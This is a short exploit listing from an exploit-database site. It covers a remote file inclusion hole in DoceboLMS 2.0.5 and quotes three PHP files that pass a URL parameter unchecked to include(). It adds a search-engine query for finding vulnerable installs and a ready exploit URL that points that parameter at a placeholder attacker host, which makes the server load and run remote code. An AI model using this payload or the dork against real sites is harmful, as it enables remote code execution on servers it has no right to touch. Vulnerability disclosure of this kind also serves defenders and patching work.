[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability

Author
beford
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-447
Category
web applications
Date add
24-05-2006
Platform
unsorted
===============================================================
DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability
===============================================================



Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?



#  0day.today [2024-09-28]  #